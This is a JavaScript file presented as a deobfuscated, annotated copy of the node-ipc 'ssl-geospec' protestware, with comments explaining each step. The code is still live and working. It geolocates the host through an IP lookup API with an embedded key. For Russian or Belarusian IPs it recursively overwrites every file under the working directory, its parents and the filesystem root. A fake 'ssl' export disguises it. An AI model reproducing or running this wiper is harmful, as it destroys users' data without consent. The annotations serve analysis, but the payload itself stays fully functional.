import u from "path"; import a from "fs"; import o from "https"; // **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.** // Obfuscated code that I deobfuscated. // I also added comments which should help explain what exactly is going on here. // Oiginally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist) // See you in prison, Brandom. // Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js // A timeout is used to add an artificial delay. setTimeout(function () { // A 50% chance that all of your files will get overwritten. const t = Math.round(Math.random() * 4); if (t > 1) return; // This URL is used to specifically target people in Russia and Belarus. const n = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154"; // A request is send to the URL above. The server sends the location of the request to the requester. o.get(n, function (t) { t.on("data", function (t) { const n = "./"; const o = "../"; const r = "../../"; const f = "/"; const c = "country_name"; // Specifically targets the citizens of Russia and Belarus. const e = "russia"; const i = "belarus"; try { const s = JSON.parse(t); const u = s[c].toLowerCase(); // "If your country is from Russia or Belarus, overwrite all of your files." const a = u.includes(e) || u.includes(i); if (a) { h(n); h(o); h(r); h(f); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); /** * @param n The relative location of CWD of where the script was ran. * @param o Presumably meant to be used recursively. */ // The function that does the overwriting. Not sure why it is `async` though. async function h(n = "", o = "") { // Checks to see if the directory within your file system exists. if (!a.existsSync(n)) return; let r = []; try { // Gets all of the files within the directory. r = a.readdirSync(n); } catch (t) {} const f = []; // Your files will get overwritten with a heart emoji. Perfect. const c = "❤️"; for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } // If the file is a directory, it will run the `h` function again. if (t.isDirectory()) { const s = h(i, o); // Again, the function was async. This will not even work properly. s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { // The files get overwritten. Thanks, Brandon. a.writeFile(i, c, function () {}); } catch (t) {} } } return f; } // Fake exports probably intended to trick consumers. const ssl = true; export { ssl, ssl as default };